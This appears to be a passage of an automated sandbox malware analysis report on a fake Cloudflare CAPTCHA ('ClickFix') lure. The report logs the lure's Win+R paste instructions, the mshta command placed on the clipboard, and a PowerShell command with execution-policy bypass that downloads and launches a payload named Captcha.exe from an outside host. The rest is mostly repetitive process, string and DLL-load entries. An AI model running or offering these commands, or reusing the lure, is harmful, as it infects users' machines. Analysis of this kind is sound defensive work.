                          Source: Captcha.exeString found in binary or memory: /gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old
                          Source: Captcha.exeString found in binary or memory: /memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent loc
                          Source: Captcha.exeString found in binary or memory: /memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent loc
                          Source: Captcha.exeString found in binary or memory: runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable t
                          Source: Captcha.exeString found in binary or memory: runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable t
                          Source: Captcha.exeString found in binary or memory: uncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime:
                          Source: Captcha.exeString found in binary or memory: uncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime:
                          Source: Captcha.exeString found in binary or memory: lfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
                          Source: Captcha.exeString found in binary or memory: lfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
                          Source: Captcha.exeString found in binary or memory: ) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime:
                          Source: Captcha.exeString found in binary or memory: ) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime:
                          Source: Captcha.exeString found in binary or memory: /sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime:
                          Source: Captcha.exeString found in binary or memory: /sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime:
                          Source: Captcha.exeString found in binary or memory: /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:
                          Source: Captcha.exeString found in binary or memory: /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:
                          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1924,i,3712918176845887802,6985471661213031996,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rea.grupolalegion.ec/p.php/1"
                          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /K mshta https://rea.grupolalegion.ec/p.php
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta https://rea.grupolalegion.ec/p.php
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\Captcha.exe "C:\ProgramData\Captcha.exe"
                          Source: C:\ProgramData\Captcha.exeProcess created: C:\ProgramData\Captcha.exe none
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1924,i,3712918176845887802,6985471661213031996,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta https://rea.grupolalegion.ec/p.phpJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\Captcha.exe "C:\ProgramData\Captcha.exe" Jump to behavior
                          Source: C:\ProgramData\Captcha.exeProcess created: C:\ProgramData\Captcha.exe noneJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\ProgramData\Captcha.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\ProgramData\Captcha.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\ProgramData\Captcha.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                          Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

                          Data Obfuscation

                          barindex
                          Suspicious powershell command line found
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"Jump to behavior
                          Source: Captcha.exe.10.drStatic PE information: section name: .symtab
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0143B3DD push eax; ret 12_3_0143B3DE
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_00523126 pushfd ; ret 12_2_00523127
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_0051DD26 pushfd ; ret 12_2_0051DD27

                          Persistence and Installation Behavior

                          barindex
                          Detect drive by download via clipboard copy & paste
                          Source: Chrome DOM: 1.4OCR Text: rea.grupolalegion.ec Verify tew seconds. Complete these Verification steps To better prove you are nat a rabat, please: 1 . Press & hold the Windows Key + R 2. In the verification window, press Ctrl + V 3, Press Enter on the keyboard to finish curity of your connection before rea.gr Yau fully agree: I am not a robot - Cloudflare Verification 10: 89ad7f proce Perform the steps above to finish verification VERIFY Ray 10: Performance & security by Cloudflare Claudflare
                          HTML page adds supicious text to clipboard
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: mshta https://rea.grupolalegion.ec/p.php
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Captcha.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Captcha.exeJump to dropped file
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
